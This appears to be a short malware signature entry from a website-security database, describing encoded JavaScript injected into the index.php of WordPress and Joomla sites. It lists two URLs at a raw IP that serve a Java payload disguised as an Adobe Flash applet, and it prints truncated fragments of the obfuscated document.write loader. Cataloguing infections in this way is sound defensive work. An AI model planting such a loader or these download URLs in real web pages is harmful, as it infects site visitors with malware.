Description:This encoded javascript loads a Java malware from:
http://208.115.215.82/plugin.exe
http://208.115.215.82/adobeflash.jar
Affecting: Any web site (common on WordPress and Joomla). Generally the index.php is modified.
Malware dump:
document.write(unescape('%3C%61%70%70%6C%65%74%20%6E..
document.write(unescape('<applet name="Adobe Flash Player 12" ..